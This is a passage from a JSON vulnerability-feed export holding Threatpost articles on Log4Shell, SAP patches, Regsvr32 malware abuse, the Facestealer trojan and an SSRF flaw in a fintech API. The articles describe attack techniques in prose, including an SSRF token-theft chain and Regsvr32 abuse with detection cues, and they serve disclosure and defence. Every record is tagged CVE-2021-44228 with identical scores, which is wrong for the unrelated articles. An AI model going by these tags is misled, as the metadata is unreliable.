"acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T19:00:36", "id": "THREATPOST:065F7608AC06475E765018E97F14998D", "href": "https://threatpost.com/riot-games-job-fraud/176950/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-15T20:20:39", "description": "SAP has identified 32 apps that are affected by [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 the critical vulnerability in the Apache Log4j Java-based logging library that\u2019s been [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) since last week.\n\nAs of yesterday, Patch Tuesday, the German software maker reported that it\u2019s already patched 20 of those apps, and it\u2019s still feverishly working on fixes for 12. SAP provided workarounds for some of the pending patches in [this document](<https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf>), accessible to users on the company\u2019s support portal.\n\nThe news about Log4Shell has been nonstop, with the easily exploited, ubiquitous vulnerability spinning off even [more dangerous variations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>), being associated with yet another [vulnerability in Apache\u2019s fast-baked patch](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) and threat actors jumping it on a [global scale](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>).\n\nBetween Sunday and Wednesday morning ET, SAP had released 50 SAP Notes and Knowledge Base entries focusing on Log4j.\n\n## **Beyond \u2018Logapalooza\u2019: Other SAP Patch Tuesday Fixes**\n\nBut hard though it may be to believe, there are other SAP security matters to attend to besidea Logapalooza, including fixes for other severe flaws in the company\u2019s products. On Tuesday, [SAP released](<https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021>) \u200b\u200b21 new and updated security patches, including four HotNews Notes and six High Priority Notes.\n\n\u201cHotNews\u201d is the highest-severity rating that SAP doles out. Three of December\u2019s HotNews-rated bugs carried a CVSS rating of 9.9 (out of 10) and the fourth hit the top mark of 10.\n\nThomas Fritsch, an SAP security researcher at enterprise security firm Onapsis, said in his SAP Patch Tuesday [writeup](<https://onapsis.com/blog/sap-security-patch-day-december-2021-patch-day-shadow-log4j>) that the number of HotNews Notes may seem high, but one of them \u2013 [#3089831](<https://launchpad.support.sap.com/#/notes/3089831>), tagged with a CVSS score of 9.9 \u2013 was initially released on SAP\u2019s September 2021 Patch Tuesday. Covering an SQL-injection vulnerability in SAP NZDT Mapping Table Framework, the note was updated in the December Patch Tuesday batch with what Fritsch said was information about possible symptoms. \u201cSAP explicitly says that the update does not require any customer action,\u201d he noted.\n\nAnother of the HotNews Notes \u2013 [#2622660](<https://launchpad.support.sap.com/#/notes/2622660>) \u2013 is rated a top criticality of 10, but it\u2019s the continuously recurring HotNews Note that provides an SAP Business Client Patch with the latest tested Chromium fixes.\n\n\u201cSAP Business Client customers already know that updates of this note always contain important fixes that must be addressed,\u201d Fritsch said. \u201cThe note references 62 Chromium fixes with a maximum CVSS score of 9.6 \u2014 26 of them rated with High Priority. The last number only reflects vulnerabilities that were reported externally, as Google doesn\u2019t provide such information about internally detected issues.\u201d\n\nTaking these out, what\u2019s left of the most critical non-Log4Shell patches are a duo for SAP Commerce that were both released with a CVSS criticality of 9.9, and which are detailed below.\n\n### SAP HotNews Note Security Note [#3109577](<https://launchpad.support.sap.com/#/notes/3109577>)\n\nThis note is for a code-execution vulnerability in SAP Commerce, localization for China, that covers 11 related CVEs. SAP has tagged it with a CVSS score of 9.9. The note patches multiple code-execution vulnerabilities in the product. Fritsch noted that the localization for China package uses the open-source library [XStream](<https://x-stream.github.io/>): a simple library that serializes objects to XML and back again.\n\nSAP\u2019s note provides a patch for version 2001 of the localization for China package, meaning that SAP Commerce customers using a lower version need to upgrade before applying the patch, Fritsch said. He pulled out two things worth mentioning when comparing the note\u2019s CVEs with the patches listed on <https://x-stream.github.io/security.html>:\n\n * The provided SAP patch contains version 1.4.15 of the XStream library\n * Version 1.4.15 specifically patches Code Execution vulnerabilities, but following the Xstream patch history, it also fixes two Denial-of-Service vulnerabilities and a Server-Site Forgery Request vulnerability\n\n\u201cAs a workaround, affected customers can also directly replace the affected XStream library file with its latest version,\u201d Fritsch advised.\n\n### SAP HotNews Note Security Note [#3119365](<https://launchpad.support.sap.com/#/notes/3119365>)\n\nThis one, which is also tagged with a CVSS score of 9.9, patches a code injection issue in a text extraction report of the Translation Tools of SAP ABAP Server & ABAP Platform.\n\nFound in Versions 701, 740, 750, 751, 752, 753, 754, 755, 756 and 804, the vulnerability allows an attacker with low privileges to execute arbitrary commands in the background, Fritsch explained. The fact that such an attacker would need at least a few privileges to exploit the vulnerability bumped its CVSS score down from 10, he said.\n\n\u201cThe provided patch just deactivates the affected coding,\u201d Fritsch continued. \u201cThe report is only used by SAP internally, was not intended for release, and does not impact existing functionality.\u201d\n\nThose who can access the note and who are interested in which report is affected can get that information in the \u201cCorrection Instructions\u201d section by activating the tab \u201cTADIR Entries,\u201d Fritsch said.\n\n## Notable SAP High Priority Notes\n\n### SAP Security Notes [#3114134](<https://launchpad.support.sap.com/#/notes/3114134>) and [#3113593](<https://launchpad.support.sap.com/#/notes/3113593>)\n\nSAP Commerce is also affected by these two notable High Priority notes.\n\nTagged with a CVSS score of 8.8, the first high-priority note addresses SAP Commerce installations configured to use an Oracle database, according to Fritsch. \u201cThe escaping of values passed to a parameterized \u201cin\u201d clause, in flexible search queries with more than 1000 values, is processed incorrectly,\u201d he explained. \u201cThis allows an attacker to execute crafted database queries through the injection of malicious SQL commands, thus exposing the backend database.\u201d\n\nSAP Commerce customers using the B2C Accelerator are also affected by SAP Security Note #3113593, tagged with a CVSS score of 7.5. The flaw can allow an attacker with direct write access to product-related metadata in B2C Accelerator to exploit a vulnerability in the jsoup library responsible for metadata sanitization before it\u2019s processed, Fritsch said, allowing the attacker to inflict long response delays and service interruptions that result in denial of service (DoS).\n\n### SAP Knowledge Warehouse High Priority Note [#3102769](<https://launchpad.support.sap.com/#/notes/3102769>)\n\nAnother high-priority note, in SAP Knowledge Warehouse (SAP KW), is #3102769, tagged with a CVSS score of 8.8. The note patches a cross-site scripting (XSS) vulnerability that can result in sensitive data being disclosed.\n\n\u201cThe vulnerability affects the displaying component of SAP KW and SAP explicitly points out that the pure existence of that component in the customer\u2019s landscape is all that is needed to be vulnerable,\u201d Fritsch cautioned.\n\nCustomers who don\u2019t actively use the displaying component of SAP KW may still experience a security breach, he noted.\n\nThe note details two possible workarounds:\n\n * Disabling the affected display component by adding a filter with a specific custom rule\n * Adding a rewrite rule to SAP Web Dispatcher to prevent redirects (this is only applicable if requests are routed via SAP Web Dispatcher)\n\n### SAP NetWeaver AS ABAP High Priority Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>)\n\nWith a CVSS score of 8.4, SAP Security Note [#3123196](<https://launchpad.support.sap.com/#/notes/3123196>) describes a code injection vulnerability in two methods of a utility class in SAP NetWeaver AS ABAP.\n\n\u201cA highly privileged user with permissions to use transaction SE24 or SE80 and execute development objects is able to call these methods and provide malicious parameter values that can lead to the execution of arbitrary commands on the operating system,\u201d Fritsch elucidated.\n\nSAP fixed the problem by integrating the affected methods directly into the class without the possibility of passing parameters to those methods. Fritsch said that the affected classes and methods are available in the \u201cCorrection Instructions\u201d section by selecting the tab \u201cTADIR Entries.\u201d\n\n### SAF-T Framework SAP High Priority Security Note [#3124094](<https://launchpad.support.sap.com/#/notes/3124094>)\n\nThis one, which patches a directory-traversal vulnerability in the SAF-T framework, is tagged with a CVSS score of 7.7. It addresses an issue with the SAF-T framework, which is used to convert SAP tax data into the Standard Audit File Tax format (SAF-T) \u2013 an OECD international standard for the electronic exchange of data that enables tax authorities of all countries to accept data for tax purposes \u2013 and back.\n\nThe note describes how an insufficient validation of path information in the framework allows an attacker to read the complete file-system structure, Fritsch explained.\n\n## Open-Source Libraries as the Weakest Link\n\nFritsch pointed to the Log4j vulnerability and the vulnerabilities described in SAP Security Notes #3109577 and #3113593 as demonstrating \u201cthat there is always a risk involved when using open-source libraries.\u201d\n\nBesides the Log4Shell elephant in the room, recent examples that prove his point about the risks entailed by relying on the security of outside code include, for example, the recent discovery of three [malicious packages hosted](<https://threatpost.com/malicious-pypi-code-packages/176971/>) in the Python Package Index (PyPI) code repository that collectively have more than 12,000 downloads: downloads that potentially translate into loads of poisoned applications.\n\nAnother of many examples of how the software supply chain has become an increasingly popular method of distributing malware cropped up last week, when a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>)\n\nExternal libraries are convenient, but are they worth the risk? You have to do the math to figure that out, Fritsch summed up: \u201cThe ability to implement new features in a short period of time is bought at the price of dependence on the security of the external libraries. Remember, a software product is only as secure as its weakest software component.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T19:31:30", "type": "threatpost", "title": "SAP Kicks Log4Shell Vulnerability Out of 20 Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T19:31:30", "id": "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "href": "https://threatpost.com/sap-log4shell-vulnerability-apps/177069/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T22:25:28", "description": "A Windows living-off-the-land binary ([LOLBin](<https://threatpost.com/cybersecurity-failing-ransomware/175637/>)) known as Regsvr32 is seeing a [big uptick](<https://github.com/uptycslabs/IOCs/tree/main/Attacker%20increasingly%20adopting%20Squiblydoo%20technique%20via%20office%20documents>) in abuse of late, researchers are warning, mainly spreading trojans like Lokibot and Qbot.\n\nLOLBins are legitimate, native utilities used daily in various computing environments, that cybercriminals use to evade detection by blending in to normal traffic patters. In this case, Regsvr32 is aMicrosoft-signed command line utility in Windows that allows users to register and unregister libraries. By registering a .DLL file, information is added to the central directory (the Registry) so that it can be used by Windows and shared among programs.\n\nThis long reach is catnip to cyberattackers, who can abuse the utility via the [\u201cSquiblydoo\u201d technique](<https://car.mitre.org/analytics/CAR-2019-04-003/>), Uptycs researchers warned.\n\n\u201cThreat actors can use Regsvr32 for loading COM scriptlets to execute DLLs,\u201d they explained in a [Wednesday writeup](<https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents>). \u201cThis method does not make changes to the Registry as the COM object is not actually registered, but [rather] is executed. This technique [allows] threat actors to bypass application whitelisting during the execution phase of the attack kill chain.\u201d\n\n## **The .OCX Connection**\n\nMalicious use of Regsvr32 has been cresting of late in the Uptycs telemetry, researchers warned, with cybercrooks specifically attempting to register .OCX files in the Registry via various types of malicious Microsoft Office documents. As a class, .OCX files contain ActiveX controls, which are code blocks that Microsoft developed to enable applications to perform specific functions, such as displaying a calendar.\n\n\u201cThe Uptycs Threat Research team has observed more than 500+ malware samples using Regsvr32.exe to register [malicious] .OCX files,\u201d researchers warned. \u201cDuring our analysis of these malware samples, we have identified that some of the malware samples belonged to [Qbot](<https://threatpost.com/revamped-qbot-trojan-packs-new-punch-hijacks-email-threads/158715/>) and [Lokibot](<https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/>) attempting to execute .OCX files\u202697 percent of these samples belonged to malicious Microsoft Office documents such as Excel spreadsheet files.\u201d\n\nMost of the Microsoft Excel files observed in the attacks carry the .XLSM or .XLSB suffixes, they added, which are types that contain embedded macros. During the attack, these usually download or execute a malicious payload from the URL using the formulas in the macros.\n\nSimilarly, some campaigns use Microsoft Word, Rich Text Format data or Composite Document (.DOC, .DOCX or .DOCM files embedded with malicious macros, according to Uptycs.\n\n## **Identifying Suspicious regsvr32 Executions**\n\nBecause Regsvr32, like other LOLBins, is used for legitimate daily operations, its abuse often evades traditional cybersecurity defenses. However, researchers noted that security teams can monitor for a couple of specific behaviors in order to track its activity:\n\n * Look for parent/child process relationships where Regsvr32 is executed with parent process of Microsoft Word or Microsoft Excel;\n * And, it can be identified by looking for Regsvr32 executions that load the scrobj.dll, which executes a COM scriptlet.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T21:56:49", "type": "threatpost", "title": "Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T21:56:49", "id": "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "href": "https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T19:24:31", "description": "A popular mobile app in the official Google Play store called \u201cCraftsart Cartoon Photo Tools\u201d has racked up more than 100,000 installs \u2013 but unfortunately for the app\u2019s enthusiasts, it contains a version of the Facestealer Android malware.\n\nThat\u2019s according to researchers at Pradeo, who said the app performs somewhat as promised, pretending to be a legitimate photo editing tool. Specifically, it claims to allow users to convert photos into cartoon or \u201cpainting\u201d-style versions using a few different filters. However, behind this mask lies a \u201csmall piece of [malicious] code that easily slips under the radar of store\u2019s safeguards,\u201d they explained.\n\nFacestealer is a [known Android threat](<https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/>) that has made its way into Google Play in the past via trojanized apps. According to past Malwarebytes [analysis](<https://blog.malwarebytes.com/detections/android-trojan-spy-facestealer/>), when the application is first launched, it guides the user to the legitimate main Facebook login page and asks users to log in before they can use the app. Then, \u201cinjected malicious JavaScript steals the login credentials and sends them to a command-and-control server,\u201d according to the firm. \u201cThe C2 server makes use of login credentials to authorize access to the [account].\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/21151430/google-play-malware.png>)\n\nSplash page for the Craftsart Cartoon Photo Tools app, from Google Play.\n\nFrom there, the trojan is off to the data-stealing races: It lifts information from victims\u2019 Facebook accounts, including email addresses and IP addresses, phone numbers, conversations and messaging histories, credit-card details, friend lists and more.\n\n\u201cWhen your login credentials for a social-media account have been stolen this can have serious consequences,\u201d explained Pradeo researchers, in a [Monday writeup](<https://blog.pradeo.com/spyware-facestealer-google-play>). \u201cIt gives threat actors a base from which to gather more information.\u201d They added, \u201cFacebook credentials are used by cybercriminals to compromise accounts in multiple ways, the most common being to commit financial fraud, send phishing links and spread fake news.\u201d\n\nA Pradeo analysis of Craftsart Cartoon Photo Tools found that the app makes connections to a Russian-registered domain that has been used for at least seven years as the command-and-control (C2) address for various malicious Android apps.\n\n\u201c[The domain] is connected to multiple malicious mobile applications that were at some points available on Google Play and later deleted,\u201d they explained. \u201cTo maintain a presence on Google Play, repackaging mobile apps is common practice for cybercriminals. Sometimes, we even observed cases in which repackaging was entirely automated.\u201d\n\nPradeo researchers said they alerted the Google Play team about the app, but as of Monday, it was [still available](<https://play.google.com/store/apps/details?id=com.craftstoon.cartoonphoto>) in the official store. Obviously, users should delete the app immediately from their phones.\n\n## **Avoiding Google Play Malware **\n\nKaspersky, in a [February posting](<https://securelist.com/mobile-malware-evolution-2021/105876/>), noted that malware was [increasingly popping up](<https://threatpost.com/updated-joker-malware-android-apps/167776/>) in Google Play, using the same tactic that Craftsart Cartoon Photo Tools uses.\n\n\u201cThe most common way to sneak malware onto Google Play is for a trojan to mimic a legitimate app already published on the site (for example, a photo editor or a VPN service) with the addition of a small piece of code to decrypt and launch a payload from the trojan\u2019s body or download it from the attackers\u2019 server,\u201d researchers explained. \u201cOften, to complicate dynamic analysis, unpacking actions are performed through commands from the attackers\u2019 server and in several steps: each decrypted module contains the address of the next one, plus instructions for decrypting it.\u201d\n\nUser should thus always be wary of any app with warning signs. In this current case, even though the app has managed to attract a large number of installs, there are definite red flags in the reviews.\n\nSome users flagged the forced Facebook login, commenting that it must be \u201csome kind of phishing.\u201d Others comments included, \u201cfake fake fake\u201d and \u201cvery very very bad app,\u201d which sum up the overall reactions of reviewers. Also, some noted that the functionality the app claims to have is limited or nonexistent \u2013 always a sign to stay away.\n\nIn all, Craftsart Cartoon Photo Tools has a 2.1-star rating, with the majority of the reviews being one-star assessments, balanced out by a handful of obviously fake five-star reviews. There are no two-, three- or four-star ratings, which is clearly telling.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n\n_ _\n\n**_ _**\n\n**_ _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-21T19:18:32", "type": "threatpost", "title": "Facestealer Trojan Hidden in Google Play Plunders Facebook Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-21T19:18:32", "id": "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "href": "https://threatpost.com/facestealer-trojan-google-play-facebook/179015/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T13:47:15", "description": "A [server-side request forgery (SSRF) flaw](<https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/>) in an API of a large financial technology (fintech) platform potentially could have compromised millions of bank customers, allowing attackers to defraud clients by controlling their bank accounts and funds, researchers have found.\n\nA team at [Salt Security\u2019s](<https://salt.security/>) [Salt Labs](<https://salt.security/blog-authors/salt-labs>) identified the vulnerability in an API in a web page that supports the organization\u2019s platform fund transfer functionality, which allows clients to transfer money from their accounts on its platform into their bank accounts, researchers disclosed in [a report published Thursday](<https://salt.security/blog/api-threat-research-server-side-request-forgery-on-fintech-platform-enabled-administrative-account-takeover>).\n\nThe company in question\u2014dubbed \u201cAcme Fintech\u201d to preserve its anonymity\u2013offers a \u201cdigital transformation\u201d service for banks of all sizes, allowing the institutions to switch traditional banking services to online services. The platform already has been actively integrated into many banks\u2019 systems and thus has millions of active daily users, researchers said.\n\nIf the flaw had been exploited, attackers could have performed various nefarious activities by gaining administrative access to the banking system using the platform. From there they could have leaked users\u2019 personal data, accessed banking details and financial transactions, and performed unauthorized fund transfers into their own bank accounts, researchers said.\n\nUpon identifying the vulnerability, researchers reviewed their findings and provided recommended mitigation to the organization, they said.\n\n## **High Reward for Threat Actors**\n\nAPI flaws are often overlooked, but researchers at Salt Labs said in the report that they \u201csee vulnerabilities like this one and other API-related issues on a daily basis.\u201d\n\nIndeed, 5 percent of organizations experienced an API security incident in the past 12 months, according to the company\u2019s [State of API Security](<https://salt.security/api-security-trends?>) report for the first quarter of 2022. This period also showed significant growth of malicious API traffic, they said.\n\n\u201c[Critical SSRF flaws](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) are more common than many FinTech providers and banking institutions realize,\u201d Yaniv Balmas, vice president of research for Salt Security said in a press statement. \u201cAPI attacks are becoming more frequent and complex.\u201d\n\nFintech companies are especially vulnerable to compromise because their customers and partners rely on a vast network of APIs to drive interactions between various websites, mobile applications and custom integrations, among other systems, researchers said.\n\nThis, in turn, makes them \u201cprime targets by attackers looking to abuse API vulnerabilities\u201d for a couple of reasons, researchers wrote.\n\n\u201cOne, their API landscape and overall functionality is very rich and complex, which leaves a lot of room for mistakes or overlooking details in development,\u201d they wrote. \u201cTwo, if a bad actor can successfully abuse this type of platform, the potential profits are huge, since it could allow control of millions of users\u2019 bank accounts and funds.\u201d\n\n## **The Vulnerability**\n\nResearchers discovered the flaw while scanning and recording all traffic sent and received across the organization\u2019s website. On a page that connects clients to various banks so they can transfer funds to their bank accounts, researchers discovered an issue with the API the browser calls to handle the request.\n\n\u201cThis specific API is using the endpoint located at \u2018/workflows/tasks/{TASK_GUID}/values,\u2019 the HTTP method used to call it is \nPUT, and the specific request data is sent in the HTTP body section,\u201d researchers explained.\n\nThe request body also carries a JWT Bearer token, which is a cryptographically signed key that lets the server know who is the requesting user and what permissions he has.\n\nThe flaw was in the request parameters that send the required data for a funds transfer\u2014specifically a parameter called \u201cInstitutionURL,\u201d researchers explained. This is a user-provided value that includes a URL pointing to some GUID value placed on the receiving bank website.\n\nIn this case, the bank\u2019s web server handled the user-supplied URL by trying to contact the URL itself, allowing for a SSRF in which the web server still tried to call an arbitrary URL if it was inserted into the code instead of the appropriate bank\u2019s URL, researchers explained.\n\n## **Exposing the SSRF Flaw**\n\nResearchers demonstrated this flaw by forging a malformed request containing their own domain. The connection coming into their server was made successfully, proving that \u201cthe server blindly trusts domains provided to it in this parameter and issues a request to that URL,\u201d they wrote.\n\nFurther, the request that came into their server included a JWT token used for authentication, which turned out to be a different one than the token included in the original request.\n\nResearchers embedded the new JWT token into a request they\u2019d previously encountered to an endpoint named \u201c/accounts/account,\u201d which had allowed them to retrieve information from a bank account. This time they returned even more information, they said.\n\n\u201cThe API endpoint recognized our new JWT administrative token and very gracefully returned a list of every user and its details across the platform,\u201d researchers revealed.\n\nTrying the request again to an endpoint named \u201c/transactions/transactions\u201d with the new token also allowed them to access a list of all transactions made by every user on the banking system, they said.\n\n\u201cThis vulnerability is a critical flaw, one that completely compromises every bank user,\u201d researchers said. \u201cHad bad actors discovered this vulnerability, they could have caused serious damage for both [the organization] and its users.\u201d\n\nSalt Labs hopes that shining a light on API threats will inspire security practitioners to take a closer look at how their systems may be vulnerable in this way, Balmas said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-07T13:46:17", "type": "threatpost", "title": "SSRF Flaw in Fintech Platform Allowed for Compromise of Bank Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-07T13:46:17", "id": "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "href": "https://threatpost.com/ssrf-flaw-fintech-bank-accounts/179247/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d \u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, __co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpo__st)._\n\n_**Questions answered (click to jump to the appropriate section):**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the log4j library to log data. Because that library is almost ubiquitous in Java applications, virtually any business that has a website is highly likely to be affected. With one line of malicious code, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. \u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will 